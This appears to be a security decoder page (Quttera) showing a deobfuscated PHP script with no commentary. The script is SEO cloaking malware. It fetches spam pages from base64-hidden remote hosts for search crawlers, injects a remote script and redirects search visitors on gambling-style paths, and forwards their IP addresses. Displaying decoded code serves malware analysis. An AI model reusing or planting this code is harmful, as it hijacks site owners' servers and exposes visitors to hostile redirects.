Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


set_time_limit(0);
 error_reporting(0);
 define('VERSION', 'VCETE');
 define('APIVERSION', '3');
 define('API', base64_decode('aHR0cHM6Ly9jZG4uY2xvdWRmbGFyZWJyLmNvbS8='));
 define('API_HTTP', base64_decode('aHR0cDovL2Nkbi5jbG91ZGZsYXJlYnIuY29tLw=='));
 define('API_JS', base64_decode('PHNjcmlwdCBhc3luYyBzcmM9Imh0dHBzOi8vYnIuZ29vZ2xlZXBsYXkuY29tL2Rhby5qcyI+PC9zY3JpcHQ+'));
 define('FALLBACK_REDIRECT_HTML', base64_decode('PGh0bWw+CiAgICA8aGVhZD4KICAgICAgICA8dGl0bGU+VGhlIHJlc291cmNlIGNhbm5vdCBiZSBmb3VuZC48L3RpdGxlPgogICAgICAgIDxzY3JpcHQ+d2luZG93LmxvY2F0aW9uPSJodHRwczovL2JyLmdvb2dsZWVwbGF5LmNvbS9kYW8uaHRtbCI7PC9zY3JpcHQ+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8aDE+Tm90IEZvdW5kPC9oMT4KICAgIDwvYm9keT4KPC9odG1sPg=='));
 $req_ref = $_SERVER["HTTP_REFERER"];
 $req_ua = $_SERVER["HTTP_USER_AGENT"];
 $host = $_SERVER['HTTP_HOST'];
 $req_uri = $_SERVER['REQUEST_URI'];
	 function is_prefix($uri, $prefix_regex = '/[?\/](app|ios|android|download|blank|bet|casino|games|play|video|poker|root|news|patt|tee|sto|bea|slo|bac|pac|tig|bmw|fru|bull|card|gods|fish|mahj|uri|bak\.php)./') {
	 return preg_match($prefix_regex, $uri) === 1;
	 
}
	 function is_crawler($ua) {
	 $crawlers = array('Googlebot', 'Bingbot', 'MSNBOT', 'Yahoo!');
		 foreach ($crawlers as $c) {
			 if (stripos($ua, $c) !== false) {
			 return true;
			 
		}
		 
	}
	 return false;
	 
}
	 function is_visitor($ref) {
		 if (substr($ref, 0, 4) === 'http') {
		 $refs = array('google.', 'bing.', 'yahoo.');
			 foreach ($refs as $r) {
				 if (stripos($ref, $r) !== false) {
				 return true;
				 
			}
			 
		}
		 
	}
	 return false;
	 
}
	 function get_content($url, $headers = array(), $conn_timeout = 0, $trans_timeout = 0) {
		 if (function_exists('curl_init')) {
		 $ch = curl_init();
		 curl_setopt($ch, CURLOPT_URL, $url);
		 curl_setopt($ch, CURLOPT_HEADER, 0);
		 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		 curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
		 curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);
		 curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
		 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $conn_timeout);
		 curl_setopt($ch, CURLOPT_TIMEOUT, $trans_timeout);
		 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
		 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
		 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
		 $result = curl_exec($ch);
			 if ($result == NULL) {
			 return file_get_contents($url);
			 
		}
		 curl_close($ch);
		 return $result;
		 
	}
		 else {
		 return file_get_contents($url);
		 
	}
	 
}
	 function get_client_ip() {
		 foreach (array('HTTP_CLIENT_IP', 'HTTP_X_REAL_IP', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) {
			 if (array_key_exists($key, $_SERVER) === true) {
				 foreach (explode(',', $_SERVER[$key]) as $ip) {
				 $ip = trim($ip);
					 if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
					 return $ip;
					 
				}
				 
			}
			 
		}
		 
	}
	 
}
	 function main() {
	 global $req_ref, $req_ua, $host, $req_uri;
	 header('Cache-Control: no-store, no-cache, must-revalidate');
	 header('Cache-Control: post-check=0, pre-check=0', FALSE);
	 header('Pragma: no-cache');
	 $uri_encoded = urlencode($req_uri);
	 $headers = array();
		 if (isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
		 $lang = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
		 array_push($headers, "Accept-Language: $lang");
		 array_push($headers, "Vary: Accept-Language");
		 
	}
		 if (is_crawler($req_ua)) {
		 $crawler_ip = get_client_ip();
			 if (is_prefix($req_uri)) {
			 header('Content-Type:text/html;
			 charset=utf-8');
				 $htmls = get_content(API . "connector.html?domain={
				$host
			}
				&uri={
				$uri_encoded
			}
				&ip={
				$crawler_ip
			}
			&ver=" . VERSION . "&v=" . APIVERSION, $headers);
			 $htmls = str_replace('</head>', API_JS . '</head>', $htmls);
			 echo $htmls;
			 exit;
			 
		}
			 else {
			 echo file_get_contents(API . "suijiurl/index.php");
			 
		}
		 
	}
		 elseif (is_prefix($req_uri) && is_visitor($req_ref)) {
		 header('Content-Type:text/html;
		 charset=utf-8');
		 $client_ip = get_client_ip();
		 $allheaders = array();
			 if (!function_exists('getallheaders')) {
				 function getallheaders() {
				 $tmp_headers = array();
					 foreach ($_SERVER as $name => $value) {
						 if (substr($name, 0, 5) == 'HTTP_') {
						 $tmp_headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
						 
					}
					 
				}
				 return $tmp_headers;
				 
			}
			 $allheaders = getallheaders();
			 
		}
			 else {
			 $allheaders = getallheaders();
			 
		}
			 foreach ($allheaders as $key => $value) {
				 if (stripos($key, 'Sec-') === 0) {
				 array_push($headers, "$key: $value");
				 
			}
			 
		}
			 $html = get_content(API . "redirectv3.html?domain={
			$host
		}
			&uri={
			$uri_encoded
		}
			&ip={
			$client_ip
		}
		&ver=" . VERSION . "&v=" . APIVERSION, $headers, 3, 3);
		 $html = str_replace('</head>', API_JS . '</head>', $html);
		 echo($html ? $html : FALLBACK_REDIRECT_HTML);
		 exit;
		 
	}
	 
}
 main();



© 2023 Quttera Ltd. All rights reserved.